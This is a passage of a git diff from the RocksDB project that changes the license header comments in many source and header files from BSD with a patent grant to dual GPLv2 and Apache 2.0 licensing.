in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/posix_logger.h b/env/posix_logger.h index e3225c0a937..3ec6f574a33 100644 --- a/env/posix_logger.h +++ b/env/posix_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/examples/c_simple_example.c b/examples/c_simple_example.c index 1bdf629d18e..5564361d1e6 100644 --- a/examples/c_simple_example.c +++ b/examples/c_simple_example.c @@ -1,7 +1,7 @@ -// Copyright (c) 2011-present, Facebook, Inc. 
All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/column_families_example.cc b/examples/column_families_example.cc index f2dec691eab..589ff8ec294 100644 --- a/examples/column_families_example.cc +++ b/examples/column_families_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include #include diff --git a/examples/compact_files_example.cc b/examples/compact_files_example.cc index 023ae403b7a..c27df8ee79d 100644 --- a/examples/compact_files_example.cc +++ b/examples/compact_files_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // An example code demonstrating how to use CompactFiles, EventListener, // and GetColumnFamilyMetaData APIs to implement custom compaction algorithm. diff --git a/examples/compaction_filter_example.cc b/examples/compaction_filter_example.cc index 8d568a9e329..7a78244a0c6 100644 --- a/examples/compaction_filter_example.cc +++ b/examples/compaction_filter_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/optimistic_transaction_example.cc b/examples/optimistic_transaction_example.cc index d28a305b349..94444e16259 100644 --- a/examples/optimistic_transaction_example.cc +++ b/examples/optimistic_transaction_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/examples/options_file_example.cc b/examples/options_file_example.cc index 360ccddf233..5dd0a479c00 100644 --- a/examples/options_file_example.cc +++ b/examples/options_file_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file demonstrates how to use the utility functions defined in // rocksdb/utilities/options_util.h to open a rocksdb database without diff --git a/examples/simple_example.cc b/examples/simple_example.cc index 57d1b25072d..52fffff5bf7 100644 --- a/examples/simple_example.cc +++ b/examples/simple_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/transaction_example.cc b/examples/transaction_example.cc index 462aada0020..7274cf7ec07 100644 --- a/examples/transaction_example.cc +++ b/examples/transaction_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 41fa9881f94..3a62bc8cb92 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/include/rocksdb/advanced_options.h b/include/rocksdb/advanced_options.h index 701bcb320a9..6f45134a683 100644 --- a/include/rocksdb/advanced_options.h +++ b/include/rocksdb/advanced_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. 
All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index bee36c47d4e..34364deac09 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1,8 +1,9 @@ -/* Copyright (c) 2011-present, Facebook, Inc. All rights reserved. - This source code is licensed under the BSD-style license found in the - LICENSE file in the root directory of this source tree. An additional grant - of patent rights can be found in the PATENTS file in the same directory. - Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +/* Copyright (c) 2011 The LevelDB Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 5ce24eda1d3..5ebd66bde88 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index 5df5855602b..ecc172b44bb 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. 
diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 03016552874..9a8c0318c5d 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2013 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/compaction_job_stats.h b/include/rocksdb/compaction_job_stats.h index 876809d2c78..ebb04a46bff 100644 --- a/include/rocksdb/compaction_job_stats.h +++ b/include/rocksdb/compaction_job_stats.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/include/rocksdb/comparator.h b/include/rocksdb/comparator.h index 1c67b0d4ebc..ac6e4a9b096 100644 --- a/include/rocksdb/comparator.h +++ b/include/rocksdb/comparator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/convenience.h b/include/rocksdb/convenience.h index b94a2164094..cb0c6f56b5c 100644 --- a/include/rocksdb/convenience.h +++ b/include/rocksdb/convenience.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 67d4aac43cf..ee5706b4c8b 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/db_bench_tool.h b/include/rocksdb/db_bench_tool.h index 0e33ae96e2d..047c4256ce6 100644 --- a/include/rocksdb/db_bench_tool.h +++ b/include/rocksdb/db_bench_tool.h @@ -1,7 +1,7 @@ // Copyright (c) 2013-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once namespace rocksdb { diff --git a/include/rocksdb/db_dump_tool.h b/include/rocksdb/db_dump_tool.h index 3ae2c29322d..cb9a265f5c8 100644 --- a/include/rocksdb/db_dump_tool.h +++ b/include/rocksdb/db_dump_tool.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 682fc65c5fc..8690738998f 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/env_encryption.h b/include/rocksdb/env_encryption.h index 764fffba779..e4c924a4b4c 100644 --- a/include/rocksdb/env_encryption.h +++ b/include/rocksdb/env_encryption.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/experimental.h b/include/rocksdb/experimental.h index 70ad0b914bd..0592fe36b17 100644 --- a/include/rocksdb/experimental.h +++ b/include/rocksdb/experimental.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index 0593c04a1c1..8c813d93e65 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/flush_block_policy.h b/include/rocksdb/flush_block_policy.h index 19a58dc0193..5daa9676248 100644 --- a/include/rocksdb/flush_block_policy.h +++ b/include/rocksdb/flush_block_policy.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/iostats_context.h b/include/rocksdb/iostats_context.h index 73a86c557bc..77a59643a1c 100644 --- a/include/rocksdb/iostats_context.h +++ b/include/rocksdb/iostats_context.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
#pragma once #include diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 9bfb0e3d61f..4e09f64e9a6 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/ldb_tool.h b/include/rocksdb/ldb_tool.h index efe450b5912..0ec2da9fc05 100644 --- a/include/rocksdb/ldb_tool.h +++ b/include/rocksdb/ldb_tool.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #pragma once #include diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index e00a03cd908..347dd3096c2 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file contains the interface that must be implemented by any collection // to be used as the backing store for a MemTable. Such a collection must diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 0ec737ab889..5fe3e0bfda8 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_ #define STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_ diff --git a/include/rocksdb/metadata.h b/include/rocksdb/metadata.h index 0b838263308..37e7b50b9b7 100644 --- a/include/rocksdb/metadata.h +++ b/include/rocksdb/metadata.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/options.h b/include/rocksdb/options.h
index 1c90a68be57..4d2f143a0f7 100644
--- a/include/rocksdb/options.h
+++ b/include/rocksdb/options.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/perf_context.h b/include/rocksdb/perf_context.h
index ff9449a5421..ff1a0caccbe 100644
--- a/include/rocksdb/perf_context.h
+++ b/include/rocksdb/perf_context.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
 #define STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
diff --git a/include/rocksdb/perf_level.h b/include/rocksdb/perf_level.h
index 89c9cdd4862..84a331c355e 100644
--- a/include/rocksdb/perf_level.h
+++ b/include/rocksdb/perf_level.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef INCLUDE_ROCKSDB_PERF_LEVEL_H_
 #define INCLUDE_ROCKSDB_PERF_LEVEL_H_
diff --git a/include/rocksdb/persistent_cache.h b/include/rocksdb/persistent_cache.h
index 352a433148a..05c36852a55 100644
--- a/include/rocksdb/persistent_cache.h
+++ b/include/rocksdb/persistent_cache.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h
index 03976a9f6cf..838c98a6de6 100644
--- a/include/rocksdb/rate_limiter.h
+++ b/include/rocksdb/rate_limiter.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h
index 33f77a0e589..fe8dee00f04 100644
--- a/include/rocksdb/slice.h
+++ b/include/rocksdb/slice.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h
index 854e0bb17be..fc82bf58456 100644
--- a/include/rocksdb/slice_transform.h
+++ b/include/rocksdb/slice_transform.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/snapshot.h b/include/rocksdb/snapshot.h
index 25c90a4076c..a96eb763e3e 100644
--- a/include/rocksdb/snapshot.h
+++ b/include/rocksdb/snapshot.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/sst_dump_tool.h b/include/rocksdb/sst_dump_tool.h
index 0dd94caba0f..021faa019cc 100644
--- a/include/rocksdb/sst_dump_tool.h
+++ b/include/rocksdb/sst_dump_tool.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #pragma once
diff --git a/include/rocksdb/sst_file_manager.h b/include/rocksdb/sst_file_manager.h
index 665fb0e2664..692007d31a2 100644
--- a/include/rocksdb/sst_file_manager.h
+++ b/include/rocksdb/sst_file_manager.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/sst_file_writer.h b/include/rocksdb/sst_file_writer.h
index 2d6ec427dd5..04d5c271a0a 100644
--- a/include/rocksdb/sst_file_writer.h
+++ b/include/rocksdb/sst_file_writer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h
index 05390e489df..b4629358e66 100644
--- a/include/rocksdb/statistics.h
+++ b/include/rocksdb/statistics.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
 #define STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
diff --git a/include/rocksdb/status.h b/include/rocksdb/status.h
index c30abf191d5..709f3837098 100644
--- a/include/rocksdb/status.h
+++ b/include/rocksdb/status.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/thread_status.h b/include/rocksdb/thread_status.h
index 294c6cb3b58..55c32ed6d2f 100644
